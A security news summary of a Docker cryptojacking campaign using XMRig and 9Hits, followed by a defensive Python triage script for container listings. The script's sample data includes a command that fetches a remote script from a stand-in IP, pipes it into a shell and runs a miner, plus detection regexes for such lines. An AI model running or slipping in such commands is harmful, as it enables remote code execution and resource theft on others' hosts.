January 18, 2024 at 12:09PM
A novel campaign is targeting vulnerable Docker services, deploying the XMRig cryptocurrency miner and the 9Hits Viewer software to generate revenue for the attacker. 9Hits is a traffic-exchange platform whose members earn credits by visiting other members' sites; the attacker farms those credits on compromised hosts. Servers are breached through an exposed Docker API, which is then used to deploy the malicious containers. The impact ranges from resource exhaustion to the potential for a more serious breach.
Key takeaways are as follows:
– Vulnerable Docker services are being targeted by threat actors deploying the XMRig cryptocurrency miner and the 9Hits Viewer software to monetize compromised hosts.
– This is the first documented case of malware deploying the 9Hits application as a payload, indicating a diversification in adversaries’ strategies to make money from compromised hosts.
– The 9Hits application is promoted as a web traffic solution: members run the 9Hits Viewer software to visit websites requested by other members, earn credits for doing so, and spend those credits to have traffic driven to their own sites.
– The exact method by which the malware spreads to vulnerable Docker hosts is currently unclear, but it is suspected to involve internet-wide scanning services such as Shodan to find hosts exposing the Docker API.
– Campaigns targeting Docker typically pull generic, legitimate images from Docker Hub and use them to run their malicious payloads.
– The 9Hits container runs the Viewer to generate credits for the attacker's 9Hits account; it is configured to visit certain categories of sites while being prevented from visiting cryptocurrency-related sites.
– The XMRig miner, when deployed, connects to a private mining pool. The immediate impact is resource exhaustion on compromised hosts, but an attacker with the Docker-level access used here could also leave a remote shell on the system, which is the more serious risk.
These takeaways give insight into the nature of the security threat and the tactics used by threat actors in targeting vulnerable Docker services.
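The following is an added example, not code from the original report or from any tool it mentions: a small triage script that reads the JSON the Docker Engine API returns for `GET /containers/json` (the data `docker ps` renders) and flags containers that fit the pattern above, namely a generic image running a miner or 9Hits command, a container in the host network namespace, or a bind mount of a sensitive host path. The indicator patterns, container IDs, image names, pool hostname and IP address are constructed for this example and are not indicators from the reporting.

```python
"""Triage running containers for the cryptojacking / traffic-farming pattern.

Input is the body of the Docker Engine API response for GET /containers/json.
The sample below is constructed for this example; names, IDs and addresses
are made up (203.0.113.10 is a documentation-range address).
"""
import json
import re

# Constructed sample of GET /containers/json output: one benign container,
# one generic image running a miner, one hypothetical 9Hits image.
SAMPLE_CONTAINERS_JSON = json.dumps([
    {
        "Id": "a1b2c3d4e5f6",
        "Image": "nginx:1.25",
        "Command": "nginx -g 'daemon off;'",
        "HostConfig": {"NetworkMode": "bridge"},
        "Mounts": [],
    },
    {
        "Id": "0123456789ab",
        "Image": "alpine:3.19",
        "Command": "/bin/sh -c 'curl -s http://203.0.113.10/setup.sh | sh; "
                   "./xmrig -o pool.example:3333 -u WALLET_PLACEHOLDER --donate-level 0'",
        "HostConfig": {"NetworkMode": "host"},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}],
    },
    {
        "Id": "fedcba987654",
        "Image": "9hits/9hits-viewer:latest",  # hypothetical image name
        "Command": "9hits-viewer --token REDACTED",
        "HostConfig": {"NetworkMode": "bridge"},
        "Mounts": [],
    },
])

# Indicator patterns (case-insensitive). These are assumptions for this
# example, chosen to match the XMRig / 9Hits pattern, not published signatures.
IMAGE_IOC = re.compile(r"xmrig|9hits|miner", re.I)
COMMAND_IOC = re.compile(
    r"xmrig|stratum\+tcp|--donate-level|9hits"
    r"|(?:curl|wget)\b[^|]*\|\s*(?:sh|bash)\b",  # remote script piped into a shell
    re.I,
)
# Host paths that give a container control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock"}


def triage_container(c):
    """Return a list of finding strings for one /containers/json entry."""
    findings = []
    image = c.get("Image", "")
    command = c.get("Command", "")
    if IMAGE_IOC.search(image):
        findings.append(f"suspicious image name: {image}")
    if COMMAND_IOC.search(command):
        findings.append("mining / traffic-farming indicator in command")
    if c.get("HostConfig", {}).get("NetworkMode") == "host":
        findings.append("host network namespace")
    for m in c.get("Mounts", []):
        if m.get("Type") == "bind" and m.get("Source") in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path mounted: {m['Source']}")
    return findings


def triage_containers(raw_json):
    """Parse a /containers/json body; return {container id: findings} for flagged ones."""
    flagged = {}
    for c in json.loads(raw_json):
        findings = triage_container(c)
        if findings:
            flagged[c["Id"]] = findings
    return flagged


if __name__ == "__main__":
    for cid, findings in triage_containers(SAMPLE_CONTAINERS_JSON).items():
        print(cid)
        for f in findings:
            print("  -", f)
```

On a live host the same function can be fed the real API body, for example the output of `curl --unix-socket /var/run/docker.sock http://localhost/containers/json`. The benign nginx container produces no findings; the alpine container is flagged on its command, its host network mode and its root bind mount, and the 9Hits container on both image name and command.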